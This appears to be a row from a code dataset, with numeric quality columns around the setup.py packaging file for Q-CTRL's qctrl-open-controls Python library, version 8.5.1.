| 27.5 | 113 | 0.633117 | 193 | 1,540 | 4.953368 | 0.373057 | 0.037657 | 0.066946 | 0.052301 | 0.497908 | 0.395397 | 0.395397 | 0.309623 | 0.309623 | 0.309623 | 0 | 0.000865 | 0.249351 | 1,540 | 55 | 114 | 28 | 0.826125 | 0.032468 | 0 | 0.292683 | 0 | 0 | 0.257392 | 0.060484 | 0 | 0 | 0 | 0 | 0 | 1 | 0.219512 | false | 0.02439 | 0.121951 | 0.146341 | 0.560976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
582df575fe79f4894587e73d79eb7a565e60e9c8 | 2,171 | py | Python | setup.py | random7s/python-open-controls | a69886090b3706e8e70d1ca9faa4f78ce6e65c86 | [
"Apache-2.0"
] | null | null | null | setup.py | random7s/python-open-controls | a69886090b3706e8e70d1ca9faa4f78ce6e65c86 | [
"Apache-2.0"
] | null | null | null | setup.py | random7s/python-open-controls | a69886090b3706e8e70d1ca9faa4f78ce6e65c86 | [
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# DO NOT EDIT THIS FILE!
# This file has been autogenerated by dephell <3
# https://github.com/dephell/dephell
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import os.path
readme = ''
here = os.path.abspath(os.path.dirname(__file__))
readme_path = os.path.join(here, 'README.rst')
if os.path.exists(readme_path):
with open(readme_path, 'rb') as stream:
readme = stream.read().decode('utf8')
setup(
long_description=readme,
name='qctrl-open-controls',
version='8.5.1',
description='Q-CTRL Python Open Controls',
python_requires='<3.10,>=3.7',
project_urls={"documentation": "https://docs.q-ctrl.com/open-controls/references/qctrl-open-controls/", "homepage": "https://q-ctrl.com", "repository": "https://github.com/qctrl/python-open-controls"},
author='Q-CTRL',
author_email='support@q-ctrl.com',
license='Apache-2.0',
keywords='q-ctrl qctrl quantum control',
classifiers=['Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'Intended Audience :: Education', 'Intended Audience :: Science/Research', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Scientific/Engineering :: Physics', 'Topic :: Scientific/Engineering :: Visualization', 'Topic :: Software Development :: Embedded Systems', 'Topic :: System :: Distributed Computing'],
packages=['qctrlopencontrols', 'qctrlopencontrols.driven_controls', 'qctrlopencontrols.dynamic_decoupling_sequences'],
package_dir={"": "."},
package_data={},
install_requires=['numpy==1.*,>=1.16.0', 'toml==0.*,>=0.10.0'],
extras_require={"dev": ["black==20.*,>=20.8.0.b1", "isort==5.*,>=5.7.0", "mypy==0.*,>=0.800.0", "nbval==0.*,>=0.9.5", "pre-commit==2.*,>=2.9.3", "pylint==2.*,>=2.6.0", "pylint-runner==0.*,>=0.5.4", "pytest==5.*,>=5.0.0", "qctrl-visualizer==2.*,>=2.12.2", "sphinx==3.*,>=3.2.1", "sphinx-rtd-theme==0.*,>=0.4.3"]},
)
| 51.690476 | 620 | 0.660986 | 291 | 2,171 | 4.869416 | 0.494845 | 0.021171 | 0.016937 | 0.055046 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041995 | 0.122524 | 2,171 | 41 | 621 | 52.95122 | 0.701837 | 0.058038 | 0 | 0 | 1 | 0.034483 | 0.601275 | 0.124571 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.137931 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.